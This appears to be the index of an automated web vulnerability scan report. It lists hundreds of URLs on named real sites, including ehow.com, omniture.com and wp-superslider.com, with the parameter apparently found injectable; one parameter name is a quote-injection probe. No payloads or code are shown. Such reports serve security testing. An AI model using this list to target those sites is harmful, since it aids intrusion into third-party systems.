http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/lightbox.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider/js/zoomer.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-includes/js/jquery/jquery.js [REST URL parameter 5]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.addthis.com/bookmark.php [username parameter]
http://www.addthis.com/bookmark.php [v parameter]
http://www.astaro.com/newsletter [uid parameter]
http://www.autocheck.com/ [siteID parameter]
http://www.autocheck.com/ [siteID parameter]
http://www.cs.tut.fi/~jkorpela/quirks-mode.html, [REST URL parameter 1]
http://www.cs.tut.fi/~jkorpela/quirks-mode.html, [REST URL parameter 1]
http://www.ehow.com/account/simple_login.aspx [afterLogin parameter]
http://www.ehow.com/account/simple_login.aspx [afterLogin parameter]
http://www.ehow.com/account/simple_register.aspx [afterLogin parameter]
http://www.ehow.com/arts-and-crafts/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/arts-and-entertainment/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/beauty-and-personal-care/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/business/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/car-repair-and-maintenance/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/careers/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/cars/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/computer-software/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/computers/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/culture-and-society/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/diseases-and-conditions/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/drugs-and-supplements/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/education/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-family/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-food/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-health/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-home/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-money/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-style/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/ehow-tax-time/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/electronics/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/family-health/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/fashion-and-style/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/fitness/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/food-and-drink/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/healthcare/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/healthy-living/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/hobbies-and-science/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/holidays-and-celebrations/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/home-building-and-remodeling/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/home-design-and-decorating/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/home-maintenance-and-repair/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/home-safety-and-household-tips/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/housekeeping/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_13299_know-someone-lying.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_2113353_end-sibling-feuds.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_3815_minutes-business-meeting.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_4469163_edit-pdf-document.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_4474239_make-graph-using-excel.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_4924781_open-pub-file-mac.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_5073161_convert-wps-file-extension.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_5381925_make-roof-rake.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_5809012_create-indoor-gardens.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_7856914_prevent-chimney-fires.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/how_9191_program-rca-universal.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/internet/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/job-search-and-employment/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/lawn-and-garden/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/legal/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/list_7189463_grammar-check-tools.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/mental-health/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/music/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/parenting/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/personal-finance/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/pets-and-animals/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/plant-care/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/plants/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/real-estate-and-investment/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/recipes/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/recreational-activities/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/relationships-and-family/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/sports/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_227_take-pictures.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_2488_lose-weight.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_253_lose-weight-now.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_3493_lose-weight-dieting.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_363_winter-sports.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_3818_flu-guide.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_3990_home-security-systems-guide.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_401_home-alarms.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_4028_preparing-flu-season.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_4127_home-alarm-system-guide.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_429_all-flu.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_4989_photo-sharing-101.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_49_treating-colds-flus.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_5023_jog-lose-weight.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_689_black-white-photos.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_7853_floor-fountains-guide.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_7992_floor-water-fountains-101.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/topic_8047_water-garden-fountains-101.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/toys-and-games/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/us-travel/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/vacations-and-travel-planning/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/video_6976779_sensational-snacks.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [name of an arbitrarily supplied request parameter]
http://www.ehow.com/weddings-and-parties/ [name of an arbitrarily supplied request parameter]
http://www.ehow.com/weight-management-and-body-image/ [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [hl parameter]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [prmd parameter]
http://www.google.com/advanced_search [q parameter]
http://www.google.com/images [q parameter]
http://www.invisionpower.com/index.php [79b73' parameter]
http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]
http://www.omniture.com/en/community/blogs [REST URL parameter 3]
http://www.omniture.com/en/community/customers.omniture.com [REST URL parameter 3]
http://www.omniture.com/en/community/developer [REST URL parameter 3]
http://www.omniture.com/en/community/events [REST URL parameter 3]
http://www.omniture.com/en/community/usergroups [REST URL parameter 3]
http://www.omniture.com/en/company/adobe_faq [REST URL parameter 3]
http://www.omniture.com/en/company/analyst_insight [REST URL parameter 3]
http://www.omniture.com/en/company/customers [REST URL parameter 3]
http://www.omniture.com/en/company/press_room [REST URL parameter 3]
http://www.omniture.com/en/company/press_room/awards [REST URL parameter 3]
http://www.omniture.com/en/company/press_room/awards [REST URL parameter 4]
http://www.omniture.com/en/company/press_room/news [REST URL parameter 3]
http://www.omniture.com/en/company/press_room/news [REST URL parameter 4]
http://www.omniture.com/en/company/press_room/press_releases [REST URL parameter 3]
http://www.omniture.com/en/company/press_room/press_releases [REST URL parameter 4]
http://www.omniture.com/en/education/academic_initiative [REST URL parameter 3]
http://www.omniture.com/en/education/certification [REST URL parameter 3]
http://www.omniture.com/en/education/certification/implementation [REST URL parameter 3]
http://www.omniture.com/en/education/certification/implementation [REST URL parameter 4]
http://www.omniture.com/en/education/certification/insight_analyst [REST URL parameter 3]
http://www.omniture.com/en/education/certification/insight_analyst [REST URL parameter 4]
http://www.omniture.com/en/education/certification/insight_architect [REST URL parameter 3]
http://www.omniture.com/en/education/certification/insight_architect [REST URL parameter 4]
http://www.omniture.com/en/education/certification/search_center [REST URL parameter 3]
http://www.omniture.com/en/education/certification/search_center [REST URL parameter 4]
http://www.omniture.com/en/education/certification/site_catalyst [REST URL parameter 3]
http://www.omniture.com/en/education/certification/site_catalyst [REST URL parameter 4]
http://www.omniture.com/en/education/certification/support [REST URL parameter 3]
http://www.omniture.com/en/education/certification/support [REST URL parameter 4]
http://www.omniture.com/en/education/certification/test_target [REST URL parameter 3]
http://www.omniture.com/en/education/certification/test_target [REST URL parameter 4]
http://www.omniture.com/en/education/courses [REST URL parameter 3]
http://www.omniture.com/en/education/courses/discover [REST URL parameter 3]
http://www.omniture.com/en/education/courses/discover [REST URL parameter 4]
http://www.omniture.com/en/education/courses/dop_analyst [REST URL parameter 3]
http://www.omniture.com/en/education/courses/dop_analyst [REST URL parameter 4]
http://www.omniture.com/en/education/courses/merchandising [REST URL parameter 3]
http://www.omniture.com/en/education/courses/merchandising [REST URL parameter 4]
http://www.omniture.com/en/education/courses/online_marketing_suite [REST URL parameter 3]
http://www.omniture.com/en/education/courses/online_marketing_suite [REST URL parameter 4]
http://www.omniture.com/en/education/courses/sbu [REST URL parameter 3]
http://www.omniture.com/en/education/courses/sbu [REST URL parameter 4]
http://www.omniture.com/en/education/courses/searchcenter [REST URL parameter 3]
http://www.omniture.com/en/education/courses/searchcenter [REST URL parameter 4]
http://www.omniture.com/en/education/courses/sitesearch [REST URL parameter 3]
http://www.omniture.com/en/education/courses/sitesearch [REST URL parameter 4]
http://www.omniture.com/en/education/courses/survey [REST URL parameter 3]
http://www.omniture.com/en/education/courses/survey [REST URL parameter 4]
http://www.omniture.com/en/education/courses/testandtarget [REST URL parameter 3]
http://www.omniture.com/en/education/courses/testandtarget [REST URL parameter 4]
http://www.omniture.com/en/partners/apply [REST URL parameter 3]
http://www.omniture.com/en/partners/portal [REST URL parameter 3]
http://www.omniture.com/en/partners/showcase [REST URL parameter 3]
http://www.omniture.com/en/privacy/2o7 [REST URL parameter 3]
http://www.omniture.com/en/privacy/policy [REST URL parameter 3]
http://www.omniture.com/en/privacy/product [REST URL parameter 3]
http://www.omniture.com/en/privacy/visualsciences [REST URL parameter 3]
http://www.omniture.com/en/privacy/visualsciences/policy [REST URL parameter 3]
http://www.omniture.com/en/privacy/visualsciences/policy [REST URL parameter 4]
http://www.omniture.com/en/privacy/visualsciences/resources [REST URL parameter 3]
http://www.omniture.com/en/privacy/visualsciences/resources [REST URL parameter 4]
http://www.omniture.com/en/privacy/visualsciences/terms [REST URL parameter 3]
http://www.omniture.com/en/privacy/visualsciences/terms [REST URL parameter 4]
http://www.omniture.com/en/resources/articles [REST URL parameter 3]
http://www.omniture.com/en/resources/case_studies [REST URL parameter 3]
http://www.omniture.com/en/resources/cmo.com [REST URL parameter 3]
http://www.omniture.com/en/resources/guides [REST URL parameter 3]
http://www.omniture.com/en/resources/testimonials [REST URL parameter 3]
http://www.omniture.com/en/resources/webinars [REST URL parameter 3]
http://www.omniture.com/en/services/consulting [REST URL parameter 3]
http://www.omniture.com/en/services/es [REST URL parameter 3]
http://www.omniture.com/en/survey/5084 [REST URL parameter 3]
http://www.omniture.com/press/867 [REST URL parameter 2]
http://www.omniture.com/press/867 [REST URL parameter 2]
http://www.omniture.com/press/868 [REST URL parameter 2]
http://www.omniture.com/press/868 [REST URL parameter 2]
http://www.orbitz.com/App/GDDC [deal_id parameter]
http://www.orbitz.com/App/PerformMDLPDealsContent [cnt parameter]
http://www.orbitz.com/App/PerformMDLPDealsContent [type parameter]
http://www.plentyoffish.com/meetme.aspx [name of an arbitrarily supplied request parameter]
http://www.plentyoffish.com/needs_test.aspx [name of an arbitrarily supplied request parameter]
http://www.plentyoffish.com/poftest.aspx [name of an arbitrarily supplied request parameter]
http://www.plentyoffish.com/seriousintro.aspx [name of an arbitrarily supplied request parameter]
http://www.ratestogo.com/ [name of an arbitrarily supplied request parameter]
http://www.scmagazineus.com/search/xss/ [REST URL parameter 2]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 1]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 2]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 3]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 1]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 2]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 3]
http://www.sitesearch.omniture.com/contact/form_support.htm [account parameter]
http://www.sitesearch.omniture.com/contact/form_support.htm [email parameter]
http://www.sitesearch.omniture.com/contact/form_support.htm [first_name parameter]
http://www.sitesearch.omniture.com/contact/form_support.htm [last_name parameter]
http://www.theroot.com/multimedia/50-years-black-history [REST URL parameter 1]
http://www.theroot.com/multimedia/50-years-black-history [REST URL parameter 2]
http://www.theroot.com/multimedia/50-years-black-history [gt1 parameter]
